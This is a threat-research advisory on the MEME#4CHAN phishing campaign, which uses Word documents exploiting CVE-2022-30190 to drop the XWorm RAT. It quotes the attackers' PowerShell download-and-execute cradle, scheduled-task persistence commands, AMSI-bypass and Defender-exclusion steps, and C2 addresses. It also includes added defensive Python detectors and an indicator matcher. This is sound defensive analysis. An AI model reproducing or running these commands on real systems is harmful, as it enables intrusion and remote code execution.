URL: https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/

SECURONIX THREAT LABS SECURITY ADVISORY: LATEST UPDATE: ONGOING MEME#4CHAN
ATTACK/PHISHING CAMPAIGN USES MEME-FILLED CODE TO DROP XWORM PAYLOADS

Threat Research

By Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov


TL;DR

An unusual attack/phishing campaign that delivers malware using meme-filled
code and complex obfuscation methods has been dropping XWorm payloads for the
last few months and is still ongoing today.




INTRO

For the last few months, the Securonix Threat Research team has identified and
tracked an interesting and ongoing attack campaign. The campaign (tracked by
Securonix as MEME#4CHAN) leverages rather unusual meme-filled PowerShell code,
followed by a heavily obfuscated XWorm payload, to infect its victims. Today
we’ll dive into this campaign with an in-depth technical analysis of the entire
attack chain, starting with the phishing email samples, covering the
obfuscation methods, and ending with an analysis of the final binary payload
that gets decoded from .NET assemblies in PowerShell.

The attack chain leveraging XWorm payloads was first reported by threat
researchers at Elastic. Today, we will take a look at some new unique payloads
along with new obfuscation methods used by the attackers that were not covered
before. We will also provide new samples, IoCs and detections which we’ve been
tracking since the start of the campaign a few months ago.

The attack begins with a malicious Microsoft Office Word document and appears to
be targeting various businesses, including German (.de) email addresses.
Microsoft Word attachments have fallen out of favor since Microsoft decided to
disable macro execution by default; however, as we dive into one of the samples
collected, it becomes clear that attempted code execution from a macro-less
document is still very much in use today.


ATTACK CHAIN OVERVIEW

The [MEME#4CHAN] campaign follows a rather unique attack chain consisting of
both PowerShell and JavaScript execution originating from a malicious Word
document file.

C# code execution contained within the main PowerShell script is used to
deliver the final payload, which ends with XWorm v3.1 execution. Below is a
diagram of the overall attack chain; we will dive into each portion of it in
depth as we continue.



Figure 1: [MEME#4CHAN] attack chain


INITIAL INFECTION

As with many modern attacks we see these days, MEME#4CHAN typically begins with
a phishing email. The attacks appear to be patterned after a known fake hotel
reservation phishing scheme. The goal is to get the company employee to open
the attached phishing document, which kicks off the initial code execution
portion of the attack. Typically the subject, body and even the contents of the
lure attachment are designed to create a sense of urgency to mask any
potentially unusual requests.


PHISHING EMAIL DETAILS

In one example, the phishing email contained the subject “Reservation For Room”
with a brief message in the body containing a generic text containing room and
booking requests. The email appears to be sent from “zoe[at]kbowlingslaw.com”,
however after examining the header, the actual sender came from a Gmail address:
“panelnew12[at]gmail.com”.

What makes this particular phishing campaign especially interesting is the fact
that the target email belonged to a German company involved in manufacturing.
This could indicate that the attackers are not only specifically targeting
hotels, but blasting out phishing emails using a generic corporate email list
and hoping for the best. To bolster this theory, another phishing email our team
intercepted was from the same Gmail address and contained the subject “Urgent
booking for Honeymoon” and was targeted to a small German hospital clinic.

Most of the phishing emails analyzed by the team followed the same pattern, so
we’ll dive into one of these in depth.


STAGE 1: EMAIL ATTACHMENT ANALYSIS: DETAILS FOR BOOKING.DOCX

Throughout the rest of this article, we’ll follow the attack chain of one
document, though others were overall similar and produced the same final result.
In this example, the email attachment is a single Microsoft Word document file
named “Details for booking.docx”. When opened, a prompt to the user appears
before any content is displayed asking the user if they want to update the
document with externally linked files.



Figure 2: Details for booking.docx linked files prompt

Whichever option of the prompt is clicked, the pop-up closes and we’re presented
with what look like stolen images of a bank debit card as well as a driver’s
license. The two cards appear to belong to two different French citizens.

The document contains no macros or discernible p-code, which means that macro
execution is not the attack vector for this phishing document.



Figure 3: Details for booking.docx file contents

Rather than using macros to execute malicious VBScript, this document uses a
known vulnerability from last year (CVE-2022-30190). In summary, this
vulnerability works by embedding references to external objects in a
relationship file within the .docx Word file. These relationship files can
reference external objects that get loaded into the document.

In this example, the document footer contained a shape object that was used
maliciously. The shape object used the footer relationship file
“footer2.xml.rels” to fetch the external objects.



Figure 4: Details for booking.docx external references

Notice on the right side of the figure above that the relationship file contains
two links to external resources.

hxxps://huskidkifklaoksikfkfijsju.blogspot[.]com/atom.xml

hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_b5b6005e2aa74cf48cd55dca1a2ff093[.]docx

The referenced file 73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx appears to be
an empty MS document file containing a single picture with a small white square.
The same code execution tactic happens again with the same referenced Blogspot
URL as the original.

The other URL contained in the original phishing document references the
atom.xml file hosted on Blogspot. This file redirects to another URL, which
downloads and executes a PowerShell script hosted on Usrfiles, a public file
sharing service, at:

hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_e5a698286daf43ac87b4544a35b1a482.txt

Some documents we observed executed PowerShell code directly contained within
the atom.xml file, while others, as with this case referenced a separate URL
containing the malicious PowerShell code.
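
To make the relationship-file mechanism concrete, here is an added triage
helper (example code written for this page, not from the Securonix advisory or
the analysed documents). It lists every relationship with TargetMode="External"
found in a .docx’s word/_rels/*.rels files, which is where the footer2.xml.rels
reference described above lives. The sample document and its example.invalid
URL are constructed in memory; only the standard library is used.

```python
# Added example (not from the Securonix advisory or the analysed documents):
# list external relationship targets in a .docx, the mechanism this section
# describes for CVE-2022-30190. Standard library only; the sample document and
# its example.invalid URL are constructed in memory.
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def external_relationships(docx_bytes: bytes) -> list:
    """Return every Relationship with TargetMode="External" under word/_rels/."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/_rels/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                findings.append({
                    "rels_file": name,
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": target,
                    # anything fetched over the network deserves a closer look
                    "remote": target.lower().startswith(("http://", "https://")),
                })
    return findings


def build_sample_docx(footer_target: str) -> bytes:
    """Constructed minimal document: one external link in the footer relationships."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OOXML_REL}/oleObject" '
        f'Target="{footer_target}" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{OOXML_REL}/image" Target="media/image1.png"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/footer2.xml", "<ftr/>")
        zf.writestr("word/_rels/footer2.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("https://example.invalid/atom.xml")
    for f in external_relationships(sample):
        print(f"{f['rels_file']}: {f['type']} -> {f['target']} (remote={f['remote']})")
```

Run it against a real attachment by passing the file’s bytes to
external_relationships(); an internal image relationship (rId2 in the sample)
is ignored, while any external target, and in particular a remote one, is
reported with the .rels file it came from.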


STAGE 2: POWERSHELL EXECUTION

The PowerShell that gets executed at this stage is semi-obfuscated and contains
quite a few functions which we’ll dive into further on. The code is rather
interesting and contains memes, crass variable names and comments throughout, so
you’ll have to pardon the use of the blur tool throughout the next series of
figures as we go through it and subsequent files.



Figure 5: 73cceb_e5a698286daf43ac87b4544a35b1a482.txt – CSharp and initial
execution

The script begins by stopping the RegSvcs and Msbuild processes; we’ll get into
why this is important further down. After that, a directory called MEMEMAN is
created inside C:\ProgramData\, which is where most of the malware staging
happens from this point on.

The $NuclearDefusion variable contains a C# script that accomplishes a few
tasks. At the beginning there is a deobfuscation function named £££ which is
used to hex-decode some of the other variables later on.

Two additional variables, each holding its own PowerShell code, are contained
inside the $amsii variable within the JJJI function:

$AMI: This variable contains a long hexadecimal string that is triple hex
encoded. Once decoded, we’re presented with a simple obfuscated AMSI bypass
technique which uses Matt Graeber’s reflection method to crash the AMSI
(Anti-malware Scan Interface) instance for the current PowerShell session. This
will prevent subsequent code from being scanned for malicious content.



Figure 6: $AMI – AMSI bypass techniques
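
As an added illustration of the triple hex encoding described for $AMI (example
code written for this page, not the campaign’s £££ decoder and not from the
advisory), the helper below peels hex layers off a blob until the result stops
being a hex string or stops being printable text. The payload it decodes is a
constructed benign string, encoded three times here.

```python
# Added example (not from the advisory and not the campaign's own decoder):
# strip repeated hex-encoding layers like the "triple hex encoded" $AMI blob.
# The sample below is a constructed benign string encoded three times here.
import binascii
import string

HEX_DIGITS = set(string.hexdigits)
PRINTABLE = set(string.printable)


def is_hex_string(text: str) -> bool:
    """True for an even-length string made only of hex digits."""
    return len(text) >= 2 and len(text) % 2 == 0 and set(text) <= HEX_DIGITS


def peel_hex_layers(blob: str, max_layers: int = 10) -> tuple:
    """Hex-decode repeatedly; stop when the result is no longer hex or no longer
    printable text. Returns (innermost text, number of layers removed).
    The stopping rule is a heuristic: plaintext that happens to look like hex
    (e.g. "4142") would be decoded once too often."""
    current = blob.strip()
    layers = 0
    while layers < max_layers and is_hex_string(current):
        try:
            decoded = binascii.unhexlify(current).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            break
        if not set(decoded) <= PRINTABLE:
            break
        current, layers = decoded, layers + 1
    return current, layers


def hex_encode_layers(text: str, layers: int) -> str:
    """Apply hex encoding `layers` times (used only to build the sample)."""
    for _ in range(layers):
        text = text.encode("utf-8").hex()
    return text


# constructed sample: a harmless command, hex-encoded three times
SAMPLE_BLOB = hex_encode_layers('Write-Host "analysis marker"', 3)

if __name__ == "__main__":
    text, n = peel_hex_layers(SAMPLE_BLOB)
    print(f"removed {n} hex layer(s): {text!r}")
```

The layer count is worth recording alongside the decoded text: a script-block
log entry whose payload only becomes readable after several hex layers is
itself a useful signal, independent of what the innermost text turns out to be.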

Next, a registry key is created under
"HKCU:\\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32"
with a default value set to "C:\IDontExist.dll". This registry change also
assists in disabling AMSI by overriding the Microsoft Defender COM object for
AMSI and pointing it at a DLL that doesn’t exist.

$DEF: This variable contains PowerShell code to once again disable AMSI using
the same two methods as before, just obfuscated differently. Additionally,
Defender exclusions are created for pretty much everything on the host using
the Add-MpPreference PowerShell cmdlet.



Figure 7: $DEF – Code samples: Disable AMSI, Defender exclusions, and new local
user

Towards the end of the script, a new local user named “System32” with a password
of 123 is created. The new local user is then added to the Administrators and
Remote Desktop Users groups. Lastly, Windows Firewall is disabled.

Moving through the C# script, we run into another obfuscated variable called
$CHOTAbheem which contains a long encoded string. Further down we see the £££
function being used to decode it.



Figure 8: Deobfuscated code behind $CHOTAbheem

The script above leverages the WScript.Shell COM object
“{40FC6ED5-2438-11CF-A3DB-080036F12502}” to execute the $NuclearDefusion
variable, which we’ll see written to disk later on. This takes us through the
first half of the original PowerShell script.



Figure 9: 73cceb_e5a698286daf43ac87b4544a35b1a482.txt – PowerShell code

The code referenced in the first half of the script is written to disk and saved
in the “C:\ProgramData\MEMEMAN” directory as “CypherDeptography.~+~” using the
PowerShell [IO.File]::WriteAllText method.

Next, let’s take a look at what’s hidden away behind the $allsave variable. Once
decoded using the same method we used to decode the $CHOTAbheem variable, we’re
faced with a hugely obfuscated JScript one-liner as seen in the figure below.



Figure 10: $allsave JScript and deobfuscated PowerShell code

Once decoded, the script behind $allsave is similar to that of $CHOTAbheem.
However, this one appears to invoke a variable referenced in the main script
which points to:

hxxps://backuphotelall.blogspot[.]com/atom.xml

Unfortunately, we were not able to pull this script, as the Blogspot URL was
taken offline at some point. However, we can speculate that it is similar to
the original atom.xml script.

Next down the list, we’ve got a repeating function (probably for redundancy)
where the $shakalakaboomboom variable is decoded. In the end, carving through
the layers of obfuscation once again, it retrieves yet another atom.xml file
from the following URL:

hxxps://3000allfitheyito.blogspot[.]com/atom.xml

Persistence is established by writing the obfuscated JScript code to disk,
saving it as \ZeeNEWsTV\UpdateEscan.js using the WriteAllText method. A
scheduled task called EscanDissldo is then created that references the newly
created file and runs once every 200 minutes:

schtasks /create /sc MINUTE /mo 200 /tn EscanDissldo /F /tr "wscript.exe //b
//e:jscript C:\\ProgramData\\MEMEMAN\\UpdateEscan.js"

The next level of persistence happens during the last 4 lines of code, where all
of the content from the staging directory ("C:\ProgramData\MEMEMAN\") is copied
to the user’s startup directory, which is resolved using
[environment]::getfolderpath("Startup").

Lastly, the script deletes the C# decode script, i.e. any file ending in *.~+~,
from the startup directory.


STAGE 3: BINARY FILE EXECUTION

Circling back to the C# portion of the original PowerShell script, there are
two variables which contain binary file data. Both are heavily obfuscated .NET
binaries protected with an unlicensed version of .NET Reactor to hide the
original source code.

Both binaries are injected into the RegSvcs.exe or Msbuild.exe process and
executed in memory as .NET assemblies loaded via reflection. For reference, the
$Ripple variable contains the hexadecimal binary data for sssss.exe, which
we’ll be going over further down.



Figure 11: In-memory assembly execution

There is a good amount of obfuscation in the P4 function, however once decoded
it is a bit easier to observe what the code is attempting to accomplish.

[Reflection.Assembly]::Load("Salmankhan($pp").GetType("A.B").GetMethod(C).Invoke($null,{[OBJECT[]]},
("C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", $Ripple)

[Reflection.Assembly]::Load("Salmankhan($pp").GetType("A.B").GetMethod(C).Invoke($null,{[OBJECT[]]},
("C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe", $Ripple)

[Reflection.Assembly]::Load("Salmankhan($pp").GetType("A.B").GetMethod(C).Invoke($null,{[OBJECT[]]},
("C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe", $Ripple)

Based on some of the hard-coded strings, this appears to be XWorm V3.1 which
interestingly enough was recently cracked and published online.


BINARY FILE ANALYSIS: SSSSS.EXE

Since XWorm is pretty well known, we won’t dive too deep into the binary
analysis portion. The binary file was assembled with an original file name of
sssss.exe and is hidden behind the variable $MEME2026. The variable is
essentially a long string of hexadecimal characters which, when decoded, make
up the entire binary file.

The executable is overall quite small, at around 85KB, and was compiled using
VS. Looking at the metadata in the figure below, it appears to pattern itself
after what you might find for an AVG install file, though this executable was
not digitally signed.



Figure 12: sssss.exe binary file details

Once we had deobfuscated the majority of the script, we were able to determine
some basic functionality. In the figure below we see some connection
parameters being defined. It establishes a connection to a remote HTTP server
using a POST request with one of three user agents chosen at random:

“Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0”

“Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15
(KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1”

“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/60.0.3112.113 Safari/537.36”



Figure 13: sssss.exe connection parameters

A unique ID is generated using the victim’s processor count, user name, machine
name, OS version, and total drive size. This is used to identify the victim
host within the attacker’s C2 infrastructure.

From a command and control standpoint, the RAT offers a large number of
attacker-initiated commands. Below is a table of each command and a brief
description of its intended functionality.

Command – Details

 * rec – Restart application
 * CLOSE – Close application
 * Uninstall – Purges all RAT files, registry keys and scheduled tasks, then exits
 * update – Runs the uninstall function, decompresses a file from a byte stream,
   opens a new memory stream
 * DW – Writes a .ps1 file from the attacker’s server and executes it using the
   command: powershell.exe -ExecutionPolicy Bypass -File "filename.ps1"
 * FM – Takes an assembly from a provided byte array, then creates an instance
   of the assembly’s entry point type and invokes it
 * LN – Downloads a file and executes it using Process.Start(filename)
 * Urlopen – Performs an HTTP GET request to a provided URL via the default
   browser
 * Urlhide – Same as Urlopen, but builds the web connection within the binary
   itself, hidden from the user
 * PCShutdown – Shuts down the victim machine using the following command:
   shutdown.exe /f /s /t 0
 * PCRestart – Restarts the victim machine using the following command:
   shutdown.exe /f /r /t 0
 * PCLogoff – Logs off the user using the following command: shutdown.exe -L
 * StartDDos – Begins a DDoS against the target
 * StopDDos – Stops the DDoS attack
 * StartReport – Attempts to abort the existing thread and then creates a new
   thread for the instance with the passed-in parameters
 * StopReport – Stops the newly created thread
 * Xchat – Opens a socket and sends specified data to the attacker’s machine
 * ngrok – Opens a socket and uses ngrok functionality
 * plugin – Unknown: appears to check for the existence of “plugin” related data
 * savePlugin – Unknown: processing of additional plugin-related data
 * OfflineGet – Performs a connectivity check
 * Cap – Captures the current user’s desktop
 * MessageBox – Sends a message to the logged-in user using MessageBox.Show();



Other functionality includes clipboard monitoring, a command shell, DoS
capabilities, disabling/enabling UAC, and the ability to trigger a BSOD.

In addition to the functionality above, the RAT also leverages WMI objects to
pull additional data such as antivirus information, date and time information.
While the connection strings were heavily obfuscated within the executable,
dynamic analysis provided a connection with the following information:

212.87.204[.]83:3000

Port3000newspm.duckdns[.]org


SOME POSSIBLE ATTRIBUTION INSIGHTS

The attack methodology is similar to that of TA558, where phishing emails were
delivered targeting the hospitality industry. TA558 also typically uses a wide
range of C2 campaign artifacts and payloads that are similar to, but not
conclusively in line with, what we witnessed in the MEME#4CHAN campaign.

Based on the English meme-themed code and 4chan references, it’s likely that the
threat actor originates from an English-speaking country, such as the UK or
US. Some of the malicious attack activity appears to be targeting victims in
Germany.


ADDITIONAL SAMPLE ANALYSIS

In addition to the attack chain above beginning with Details for booking.docx,
the Securonix Threat Research team also identified other connected samples,
including:

Document – C2 Infrastructure

 * Autorização do documento.docx
   * hxxps://www.mediafire[.]com/file/t820jnuwf9mri17/excelDNALibrary-AddIn64-packed.xll/file
   * hxxps://urlintimacygoombguch.blogspot[.]com/atom.xml
 * Passport and Id for booking details.docx
   * hxxps://www.mediafire.com/file/giv692dqvctosb3/50002023[.]txt/file




POST EXPLOITATION ANALYSIS AND OBSERVATIONS

We observed the attackers execute the following commands on our system. As you
can see, executed commands originated from the RegSvcs.exe process, confirming
the in-memory injection techniques seen in the original PowerShell script.

Process – Command Line

 * winword.exe – winword.exe /n
   "c:\users\[redacted]\downloads\autorização do documento.docx" /o ""
 * explorer.exe – c:\windows\explorer.exe
 * mshta.exe – c:\windows\system32\mshta.exe -embedding
 * svchost.exe – c:\windows\system32\svchost.exe -k dcomlaunch -p
 * regsvcs.exe – powershell.exe -ep bypass -c
   (i'w'r('hxxps://powpowpowff.blogspot[.]com/atom.xml') -useb) |
   .('{1}{0}'-f'ex','i') | ping 127.0.0.1
 * schtasks.exe – Schtasks.exe /create /sc minute /mo 120 /tn escansupdate /f
   /tr "wscript.exe //b //e:jscript
   c:\\programdata\\REDACTED\\windowsdefenderupdate.js"
 * powershell.exe –
   "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -c
   (i'w'r('hxxps://powpowpowff.blogspot[.]com/atom.xml') -useb) |
   .('{1}{0}'-f'ex','i') | ping 127.0.0.1
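
The process tree above, the scheduled-task persistence and Defender/AMSI
tampering described in Stage 2, and the reflective assembly loading in Stage 3
all leave recognisable patterns in process-creation and PowerShell logs. The
following added example (written for this page, not Securonix code) expresses
those patterns as detection rules and runs them over constructed sample events
patterned on the table above, with example.invalid standing in for the real
domains and STAGING for the staging directory name. It is similar in spirit to
the Spotter queries at the end of this post, but runnable on its own.

```python
# Added example, not from the Securonix advisory: command-line and script-block
# detection rules for the behaviours described in this post, run over
# constructed sample events. example.invalid replaces the real C2 domains.
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    processes: tuple  # process names the rule applies to; empty = any process
    pattern: re.Pattern


# User-writable locations of the kind seen in the campaign's schtasks /tr target.
WRITABLE_DIRS = (r"(?:\\programdata\\|\\users\\|\\public\\|\\appdata\\|"
                 r"\\temp\\|\\tasks\\|\\desktop\\|\\downloads\\)")

RULES = (
    # '{1}{0}' -f 'ex','i' style string reordering via the PowerShell format operator
    Rule("format_operator_obfuscation", (),
         re.compile(r"\{\d\}\s*\{\d\}.*?-f\s*['\"]", re.I)),
    # execution-policy bypass combined with a web download in the same command
    Rule("powershell_bypass_download_cradle", (),
         re.compile(r"(?:-ep|-executionpolicy)\s+bypass[\s\S]*?(?:https?://|-useb)", re.I)),
    # scheduled task whose action is a script host running a file from a writable path
    Rule("schtasks_script_host_in_writable_dir", ("schtasks.exe",),
         re.compile(r"/create[\s\S]*?/tr\s+\"?[cw]script\.exe[\s\S]*?" + WRITABLE_DIRS, re.I)),
    # Defender exclusions added or monitoring switched off via MpPreference cmdlets
    Rule("defender_exclusion_or_disable", (),
         re.compile(r"(?:Add|Set)-MpPreference[\s\S]*?(?:-Exclusion\w+|-Disable\w+Monitoring)", re.I)),
    # in-memory .NET assembly loading through reflection
    Rule("reflective_assembly_load", (),
         re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\(", re.I)),
    # the AMSI COM server CLSID named in the post appearing in a command line
    Rule("amsi_com_server_hijack", (),
         re.compile(r"CLSID\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec\}\\InProcServer32", re.I)),
)

SAMPLE_EVENTS = [  # constructed, patterned on the post-exploitation process table
    {"process": "winword.exe",
     "cmdline": r'winword.exe /n "c:\users\alice\downloads\booking.docx" /o ""'},
    {"process": "regsvcs.exe",
     "cmdline": "powershell.exe -ep bypass -c (i'w'r('https://example.invalid/atom.xml') -useb) "
                "| .('{1}{0}'-f'ex','i') | ping 127.0.0.1"},
    {"process": "schtasks.exe",
     "cmdline": r'Schtasks.exe /create /sc minute /mo 120 /tn escansupdate /f '
                r'/tr "wscript.exe //b //e:jscript c:\programdata\STAGING\update.js"'},
    {"process": "powershell.exe",
     "cmdline": r"powershell.exe -c Add-MpPreference -ExclusionPath 'C:\' -ExclusionProcess 'powershell.exe'"},
    {"process": "powershell.exe",
     "cmdline": "powershell.exe -c [Reflection.Assembly]::Load($bytes).GetType('A.B').GetMethod('C').Invoke($null, $args)"},
    {"process": "powershell.exe",
     "cmdline": r"powershell.exe -c New-Item 'HKCU:\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32' -Value 'C:\IDontExist.dll'"},
    {"process": "svchost.exe",
     "cmdline": r"c:\windows\system32\svchost.exe -k dcomlaunch -p"},
]


def detect(events) -> list:
    """Return (process, rule name) pairs for every rule that fires on an event."""
    hits = []
    for event in events:
        process = event["process"].lower()
        for rule in RULES:
            if rule.processes and process not in rule.processes:
                continue
            if rule.pattern.search(event["cmdline"]):
                hits.append((process, rule.name))
    return hits


if __name__ == "__main__":
    for process, rule_name in detect(SAMPLE_EVENTS):
        print(f"{process:16} {rule_name}")
```

Each rule is deliberately narrow: the schtasks rule, for example, fires only
when the task action is a script host and the script lives in a user-writable
directory, which keeps legitimate administrative tasks out of the results. The
benign winword.exe and svchost.exe events produce no hits, while the regsvcs.exe
event trips two rules at once.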




C2 AND INFRASTRUCTURE

Much of the infrastructure used in the MEME#4CHAN campaign was hosted from
public file sharing services such as usrfiles and mediafire. Additionally,
atom.xml files on random blogspot domains were used. Some either redirected to a
.txt file containing malicious PowerShell code while others contained the
PowerShell code directly.

The following IP addresses and domains were observed as a part of the overall C2
infrastructure during [MEME#4CHAN] campaign.

C2 and Network IoCs
hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx
hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_16620dd76e094b4888c85467a58e79df.txt
hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_e5a698286daf43ac87b4544a35b1a482.txt
hxxps://529f38d0-3744-4286-b484-be860d475d25.usrfiles[.]com/ugd/529f38_41875cf4c8844415994858b3623063f9.txt
hxxps://42502d2a-e7ed-4a16-9f11-33ffe6c54021.usrfiles[.]com/ugd/42502d_fb4a2f640cf14ab2a8bcbde16bd178ba.txt
hxxps://powpowpowff.blogspot[.]com/atom.xml
hxxps://huskidkifklaoksikfkfijsju.blogspot[.]com/atom.xml
hxxps://backuphotelall.blogspot[.]com/atom.xml
hxxps://3000allfitheyito.blogspot[.]com/atom.xml
hxxps://urlintimacygoombguch.blogspot[.]com/atom.xml
hxxps://port5000duki.blogspot[.]com/atom.xml
hxxps://bakc5002.blogspot[.]com/atom.xml
hxxps://billielishhui.blogspot[.]com/atom.xml
hxxps://doccallingupdate.blogspot[.]com/atom.xml
hxxps://urlpropogationintimitacyi[.]blogspot.com/atom.xml
hxxps://www.mediafire[.]com/file/t820jnuwf9mri17/excelDNALibrary-AddIn64-packed.xll/file
hxxps://www.mediafire.com/file/giv692dqvctosb3/50002023[.]txt/file
hxxps://www.mediafire[.]com/file/q1zrci43zt8hlix/7000.txt/file
hxxps://www.mediafire[.]com/file/79jzbqigitjp2v2
port3000newspm.duckdns[.]org
212.87.204[.]83:3000
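
As an added example (written for this page, not Securonix code), the helper
below refangs indicators written in the hxxps / [.] style used in the list
above and matches them against proxy log lines, distinguishing exact-URL, host
and IP:port hits. The indicators are taken from the list; the proxy log lines
and their client addresses are constructed.

```python
# Added example (not Securonix code): refang indicators written in the hxxps /
# [.] style used in this advisory and match them against proxy log lines.
# The log lines are constructed; the indicators are taken from the list above.
from __future__ import annotations
import re
from urllib.parse import urlparse

SAMPLE_IOCS = [
    "hxxps://powpowpowff.blogspot[.]com/atom.xml",
    "hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_e5a698286daf43ac87b4544a35b1a482.txt",
    "port3000newspm.duckdns[.]org",
    "212.87.204[.]83:3000",
]

# constructed proxy log: timestamp client method target status
SAMPLE_PROXY_LOG = """\
2023-04-18T10:01:02Z 10.0.0.5 GET https://www.example.com/index.html 200
2023-04-18T10:01:09Z 10.0.0.5 GET https://powpowpowff.blogspot.com/atom.xml 200
2023-04-18T10:01:10Z 10.0.0.5 GET https://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_e5a698286daf43ac87b4544a35b1a482.txt 200
2023-04-18T10:02:30Z 10.0.0.7 CONNECT 212.87.204.83:3000 200
2023-04-18T10:03:00Z 10.0.0.7 GET https://port3000newspm.duckdns.org/ 200
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")
SOCKET_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}:\d+")


def refang(ioc: str) -> str:
    """Undo hxxp(s):// and [.] defanging so the indicator compares to real traffic."""
    text = re.sub(r"^hxxp", "http", ioc.strip(), flags=re.I)
    return text.replace("[.]", ".").replace("(.)", ".")


def split_target(target: str) -> tuple[str, int | None]:
    """Host and port of a URL or of a bare host:port (as seen in CONNECT requests)."""
    if "://" in target:
        parsed = urlparse(target)
        return (parsed.hostname or "").lower(), parsed.port
    host, _, port = target.partition(":")
    return host.lower(), int(port) if port.isdigit() else None


def build_index(iocs) -> tuple[set, set, set]:
    """Sort indicators into exact URLs, hostnames and ip:port sockets."""
    urls, hosts, sockets = set(), set(), set()
    for raw in iocs:
        ioc = refang(raw)
        if "://" in ioc:
            urls.add(ioc.lower())
            hosts.add(split_target(ioc)[0])  # the host alone is also an indicator
        elif SOCKET_RE.fullmatch(ioc):
            sockets.add(ioc)
        else:
            hosts.add(ioc.lower())
    return urls, hosts, sockets


def match_proxy_log(log_text: str, iocs) -> list:
    """Return (client, target, match kind) for each log line that hits an indicator."""
    urls, hosts, sockets = build_index(iocs)
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        _ts, client, _method, target, _status = m.groups()
        host, port = split_target(target)
        if target.lower() in urls:
            hits.append((client, target, "url"))
        elif host in hosts:
            hits.append((client, target, "host"))
        elif port is not None and f"{host}:{port}" in sockets:
            hits.append((client, target, "socket"))
    return hits


if __name__ == "__main__":
    for client, target, kind in match_proxy_log(SAMPLE_PROXY_LOG, SAMPLE_IOCS):
        print(f"{client:10} {kind:7} {target}")
```

Matching on the host of a URL indicator as well as the full URL matters here
because the campaign rotated file names on the same hosting accounts; a host
hit on a usrfiles or blogspot address from this list is worth a look even when
the path differs from the ones published above.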




CONCLUSION

The [MEME#4CHAN] campaign provided us with some interesting insights. Though
phishing emails rarely use Microsoft Office documents since Microsoft made the
decision to disable macros by default, today we’re seeing proof that it is still
important to be vigilant about malicious document files, especially in this case
where there was no VBscript execution from macros.

It’s likely that since several C2 domains are still active that this campaign is
ongoing. Also, given the fact that XWorm v3.1 was recently cracked and released,
it’s likely that activity surrounding this particular strain will only increase.


SECURONIX RECOMMENDATIONS AND MITIGATIONS

 * Avoid opening any attachments, especially those that are unexpected or come
   from outside the organization. Be extra vigilant with Microsoft document
   files, even if no macros are present.
 * Implement an application whitelisting policy to restrict the execution of
   unknown binaries.
 * Deploy additional process-level logging such as Sysmon and PowerShell logging
   for additional log detection coverage.
 * Monitor for the usage of potentially malicious file hosting websites such as
   mediafire and usrfiles.
 * Securonix customers can scan endpoints using the Securonix Seeder Hunting
   Queries below.


MITRE ATT&CK MATRIX

Tactic – Technique

 * Initial Access
   * T1566: Phishing
   * T1566.001: Phishing: Spearphishing Attachment
 * Execution
   * T1204.002: User Execution: Malicious File
   * T1059.001: Command and Scripting Interpreter: PowerShell
   * T1059.003: Command and Scripting Interpreter: Windows Command Shell
   * T1059.007: Command and Scripting Interpreter: JavaScript
   * T1204.001: User Execution: Malicious Link
 * Defense Evasion
   * T1027.010: Obfuscated Files or Information: Command Obfuscation
   * T1055.009: Process Injection: Proc Memory
   * T1620: Reflective Code Loading
 * Persistence
   * T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup
     Folder
   * T1053: Scheduled Task/Job
 * Command and Control
   * T1573.001: Encrypted Channel: Symmetric Cryptography
   * T1105: Ingress Tool Transfer
   * T1571: Non-Standard Port
